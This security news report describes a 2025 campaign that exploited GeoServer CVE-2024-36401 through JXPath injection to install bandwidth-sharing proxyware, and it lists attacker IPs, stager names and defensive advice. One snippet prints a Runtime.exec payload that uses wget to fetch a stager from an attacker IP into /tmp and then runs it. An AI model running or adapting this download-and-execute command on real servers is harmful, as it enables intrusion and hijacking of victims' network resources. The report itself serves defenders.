A covert operation surfaced in early March 2025, leveraging a significant remote code execution vulnerability in GeoServer (CVE-2024-36401) to infiltrate publicly accessible geospatial servers.
Perpetrators capitalized on JXPath query injection within Apache Commons libraries, facilitating arbitrary code execution via expertly crafted XML requests.
This access point allowed the discreet installation of tailored executables that utilized legitimate passive-income software development kits (SDKs) and tools, effectively transforming victim networks into illegal proxy farms.
Shortly after the first wave, Palo Alto Networks analysts observed a notable increase in probing efforts against susceptible GeoServer instances.
.webp)
Cortex Xpanse telemetry uncovered over 3,700 publicly reachable servers in the first week of May 2025, highlighting the extensive attack surface accessible to threat actors.
These adversaries acted swiftly to avoid detection, rotating distribution IPs from 37.187.74[.]75 to 185.246.84[.]189 and broadening backend infrastructure to include a transfer.sh-style file-sharing service on port 8080.
The monetization tactic behind this initiative prioritized long-term stealth over immediate resource depletion.
Instead of implementing noisy cryptocurrency miners, attackers deployed two primary payloads: a misappropriated SDK that discreetly aggregated bandwidth-sharing sessions among infected devices, and a misused app that generated concealed directories and activated executables with minimal resource usage.
Both payloads emulated legitimate passive-income services, complicating detection through signature-based safeguards.
Victims remained oblivious as their systems silently routed web traffic or engaged in residential proxy networks.
By incorporating authentic Dart-compiled binaries, the attackers capitalized on cross-platform capabilities to target Linux servers and elude detection signatures crafted for more prevalent malware languages.
Indicators of compromise encompassed connections to hxxp://37.187.74[.]75:8080 and hxxp://64.226.112[.]52:8080, where stage-one scripts such as z593 retrieved additional stagers.
Infection Mechanism Deep Dive
One of the most nefarious features of this campaign is its exploitation of JXPath’s extension functions.
Upon receiving a crafted GetPropertyValue request, GeoServer’s property accessor mechanism transmitted an attacker-controlled expression into the iteratePointers method.
This payload subsequently invoked the javax.lang.Runtime.exec function, initiating remote command execution.
.webp)
A snippet illustrating this injection follows:
<![CDATA[
Runtime.exec("wget http://185.246.84.189:8080/z593 -O /tmp/z593; chmod +x /tmp/z593; /tmp/z593"
)]]>
Upon successful execution, z593 functioned as a stager, creating a concealed folder under /var/tmp/.cache and retrieving two further payloads: z401, which set up the execution environment, and z402, which initiated the primary executable with an embedded SDK key.
.webp)
By chaining these stages, the attackers achieved persistence and ensured that bandwidth-sharing processes resumed automatically upon reboot.
Through this meticulous, multi-stage strategy, threat actors have showcased how utilizing legitimate SDKs and file-sharing services can enable undetected monetization of network resources.
Security teams are advised to apply GeoServer patches immediately, monitor outbound connections to recognized malicious IPs, and implement behavioral analytics capable of identifying abnormal JXPath queries to counter similar campaigns.